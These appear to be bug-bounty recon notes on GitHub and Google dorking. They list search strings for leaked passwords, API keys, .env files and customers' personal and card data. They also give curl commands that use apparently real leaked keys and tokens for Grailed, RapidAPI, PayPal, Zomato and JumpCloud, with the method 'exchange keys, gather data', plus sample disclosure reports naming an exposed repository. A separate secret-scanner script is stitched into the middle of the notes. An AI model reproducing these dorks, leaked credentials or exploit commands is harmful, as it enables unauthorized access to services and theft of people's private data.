Github-Rcon-Exploit

Uploaded by dokapo5462

Information disclosure finding

Manual

Platform : Github

Notes:
1. First exploit, then report
2. Don't hurry
3. You will find multiple keys, tokens, data etc., but wait for the exploit lecture
4. Not every key or token can be exploited


Third party : Agri10x -> TCS, Nokia

Org : Nokia -> Nokia



"site.com" access token


aws_access_key
aws_secret_key
api key
passwd
pwd
heroku
slack
firebase
swagger
aws key
password
ftp password
jdbc
db
sql
secret jet
config
admin
json
gcp
htaccess
.env
ssh key
.git
access key
secret token
oauth_token
oauth_token_secret

Recon

If the code search result count is less than 3k: leave the target

Dorks

dotfiles
filename:sftp-config.json password
filename:.s3cfg
filename:config.php dbpasswd
filename:.bashrc password
filename:.esmtprc password
filename:.netrc password
filename:_netrc password
filename:.env MAIL_HOST=smtp.gmail.com
filename:prod.exs NOT prod.secret.exs
filename:.npmrc _auth
filename:WebServers.xml
filename:sftp-config.json
filename:passwd path:etc
filename:prod.secret.exs
filename:proftpdpasswd
filename:travis.yml
filename:vim_settings.xml
filename:sftp.json path:.vscode
filename:secrets.yml password
extension:sql mysql dump
extension:sql mysql dump password
extension:pem private
extension:ppk private

api_key
“api keys”
authorization_bearer:
oauth
auth
authentication
client_secret
api_token:
“api token”
client_id
password
user_password
user_pass
passcode
client_secret
secret
password hash
OTP
user auth

remove password
root
admin
log
trash
token
FTP_PORT
FTP_PASSWORD
DB_DATABASE=
DB_HOST=
DB_PORT=
DB_PASSWORD=
DB_PW=
DB_USER=
number

e.g.: language:shell username
language:sql username
language:python ftp
language:bash ftp
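As an added defensive example (not part of these notes): a small pre-push scanner that turns the filename and keyword dorks above into rules and runs them over a repository's files, so the same exposures the dorks surface on GitHub are caught before the commit leaves the developer's machine. The sample file contents, the rule set and the finding labels are constructed for this example; the evidence is redacted so the scanner's own report does not re-leak a value.

```python
import re

# Constructed sample repo contents (no real secrets): the kinds of lines the
# filename and keyword dorks on this page are designed to surface.
SAMPLE_FILES = {
    ".env": "DB_HOST=localhost\nDB_PASSWORD=s3cr3t-example\nMAIL_HOST=smtp.gmail.com\n",
    "settings.py": "DEBUG = True\naws_secret_key = 'EXAMPLEKEYabcdefghijklmnopqrstuvwxyz0123'\n",
    "README.md": "Run `make test` before pushing.\n",
    "sftp-config.json": '{"host": "sftp.example.org", "password": "hunter2-example"}\n',
}

# Assumption: these rules are this example's own translation of the dork list
# above into patterns; the labels are made up for the report.
SENSITIVE_FILENAMES = {"sftp-config.json", ".s3cfg", ".npmrc", ".env", ".netrc", "_netrc"}
CONTENT_RULES = [
    ("db-credential", re.compile(r"^(DB_PASSWORD|DB_PW|FTP_PASSWORD)\s*=\s*\S+", re.M)),
    ("aws-secret", re.compile(r"aws_secret_key\s*[:=]\s*['\"]?\S{16,}", re.I)),
    ("generic-password", re.compile(
        r"\b(password|passwd|pwd)\b\s*[\"']?\s*[:=]\s*[\"']?[^\s\"']+", re.I)),
    ("token", re.compile(
        r"\b(api[_ ]?key|client_secret|oauth_token|secret[_ ]?token)\b\s*[:=]\s*\S+", re.I)),
]

def redact(match_text):
    """Keep the key name but mask the value so the report cannot re-leak it."""
    sep = "=" if "=" in match_text else ":"
    head, found, tail = match_text.partition(sep)
    return head + found + "*" * min(len(tail), 8) if found else match_text

def scan_file(path, text):
    """Return (rule, evidence) findings for one file: filename hits, then content hits."""
    findings = []
    base = path.rsplit("/", 1)[-1]
    if base in SENSITIVE_FILENAMES:
        findings.append(("sensitive-filename", base))
    for label, pattern in CONTENT_RULES:
        for m in pattern.finditer(text):
            findings.append((label, redact(m.group(0))))
    return findings

def scan_repo(files):
    """Scan a {path: contents} mapping and return {path: findings} for files with hits."""
    report = {}
    for path, text in files.items():
        hits = scan_file(path, text)
        if hits:
            report[path] = hits
    return report

if __name__ == "__main__":
    for path, hits in scan_repo(SAMPLE_FILES).items():
        print(path, hits)
```

Wired into a pre-commit hook over the staged files, a non-empty report is the signal to block the push and rotate the value, since once pushed the key must be treated as compromised.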

ORG

Google search:

samsung github
nokia github
zomato github
tesla github


"gov.in" phone number

"dell.com" @dell.com
"@mastercard.com"
"mastercard.com" phone number
"mastercard.com" PH NO
"mastercard.com" ID

Verification

Truecaller
Email verifiers
OSINT

gojek.com

Impact:
1. Personal reputation
2. Company reputation
3. IPO / shares: effect on the market
4. Client reduction
5. Finance


GDPR
Hello team,

Aditya here, found a security issue in one of your domains. Please look into it.

Title: Exposed .sql file disclosing sensitive information [Email, ID, Password]

Description:
The application does not properly prevent sensitive system-level information from
being accessed by unauthorized actors who do not have the same level of access to
the underlying system as the application does. A .sql file is accessible to the public,
disclosing information to non-authorized people.

Steps:
1. Google query: site:uu.nl ext:sql | ext:dbf | ext:mdb
2. First URL: https://git.science.uu.nl/arjan/wt-p3/-/blob/master/init.sql
3. Scroll down or search for "password"

Impact:
1. Able to access information like id, login, password, first name, last name, email
2. Visible product catalogue id, price, name, description, category, counter,
manufacturer, seller
An attacker can use this information to sell it, use it, deactivate user accounts,
phish, etc.

POC:
image.png

Dorking

Walmart, Zomato: phone no, address, credit/debit card, UPI ID, city

20+

Walmart:
ST no
Ph no
CC detail
Postal Code
Postal Address

"walmart.com" Postal Address

zomato users
swiggy users
uber users

=======================================================

Exploits

Third Party : Zomato : Google Map API : Wordpress

Company Service : Uber : API
Detection : Key name, Service name

BASE URL

"filepicker_conversion_url":"https://process.fs.grailed.com","filepicker_key":"AJdAgnqCST4iPtnUxiGtTz"

curl -X POST \
  -d url="https://upload.wikimedia.org/wikipedia/commons/thumb/4/47/PNG_transparency_demonstration_1.png/420px-PNG_transparency_demonstration_1.png" \
  "https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

curl -X POST --data-binary @test.txt --header "Content-Type: text/plain" \
  "https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

Google query:

grailed.com api docs curl
paytm api docs curl
segment api docs curl
paypal api docs curl

curl --request GET \
  --url https://apidojo-hm-hennes-mauritz-v1.p.rapidapi.com/regions/list \
  --header 'X-RapidAPI-Host: apidojo-hm-hennes-mauritz-v1.p.rapidapi.com' \
  --header 'X-RapidAPI-Key: 7e06e2fe93msh93a651f74b7e29fp17c6e7jsna95be08dc858'

token : E4gg1bkY8HgPXVFuqOeQMXppxgdfJglTkYaez4tLVUnVBeRsgTpVBK9ngxGdqp7

curl -v -X GET "https://api-m.sandbox.paypal.com/v1/invoicing/invoices?page=3&page_size=4&total_count_required=true" \
  -H "Content-Type: application/json" \
  -H "Authorization: E4gg1bkY8HgPXVFuqOeQMXppxgdfJglTkYaez4tLVUnVBeRsgTpVBK9ngxGdqp7"

curl -u KEY:SECRET 'https://amplitude.com/api/2/events/segmentation?e={"event_type":"_active"}&start=20170301&end=20170321'

curl --header "X-Zomato-API-Key:7749b19667964b87a3efc739e254ada2" \
  "https://api.zomato.com/v1/search.json?city_id=1"

curl -X GET --header "Accept: application/json" --header "user-key:" \
  "https://developers.zomato.com/api/v2.1/restaurant?res_id=ccd"

curl -X GET --header "Accept: application/json" --header "user-key: 6aebfe02b9c7820ae965ccf5769fea39" \
  "https://developers.zomato.com/api/v2.1/restaurant?res_id=1"

1. Look for the key name or service name
2. Look for the target's API docs with curl examples
3. Take the curl command and exchange the keys
4. Gather data or exploit

curl -X POST \
  -d url="https://events.eurid.eu/media/upload/tedex_2012-2790.jpg" \
  "https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

API key exploit led to Blind SSRF, EXIF issue , Third party image upload

Hi team,

Aditya here, found an information disclosure bug. Please look into it.

Description: Disclosed API key to list user information

Developers are increasingly relying on cloud-based tools to automate building
code and deployment of services, which is leading to far more instances of
accidental public exposure of sensitive data.

There are a lot of things that hackers can do with a developer’s cloud
credentials: spin up hundreds of servers, take down servers, “redistribute” DNS and
load balancers, and much more. Accidental public exposure of credentials such as
API keys, OAuth tokens, and app secrets is a mistake that can be made by both
inexperienced and seasoned developers, particularly when it comes to source
control. Right now there are thousands of exposed API keys on GitHub that can be
found in just minutes using GitHub code search; these can be found in seconds by
bots.

Consider Your Data Compromised When You Push a Commit

When it comes to accidental exposure of API keys and other sensitive data on
GitHub, GitHub states very clearly on the advanced Git help page that “once you
have pushed a commit to GitHub, you should consider any data it contains to be
compromised. If you committed a password, change it! If you committed a key,
generate a new one.” GitHub provides detailed instructions on how to purge a file
from a GitHub repository’s history.

Key Found URL:

https://github.com/tggrsmth/jumpcloudapp/blob/35cc63f0fcd874ffd0dde0d1194c891da78b5981/.env

Exploit:

curl -H "x-api-key: 0158cfa7ab5d88a2a09e3963228da6ecb9a0ffa7" \
  "https://console.jumpcloud.com/api/systems"

curl -L -X POST 'https://amplitude.com/api/2/lookup_table/:name' \
  -u API_KEY:SECRET_KEY \
  -F 'file=@"/path/to/file.csv"'

399720f6f904f106e162cd2bd0011a6f

curl --location --request GET 'https://developers.zomato.com/api/v2.1/categories' \
  --header 'user-key: 399720f6f904f106e162cd2bd0011a6f'

curl --location --request GET 'https://developers.zomato.com/api/v2.1/cities?q=pune&lat=-77596659.4184915&lon=-77596659.4184915&city_ids=*&count=56625527' \
  --header 'user-key: 399720f6f904f106e162cd2bd0011a6f'

curl --location --request GET 'https://developers.zomato.com/api/v2.1/cuisines?lat=-77596659.4184915&lon=-77596659.4184915&city_id=*' \
  --header 'user-key: 399720f6f904f106e162cd2bd0011a6f'

1. "zomato.com" api key
2. zomato api docs curl
3. curl
4. exchange keys
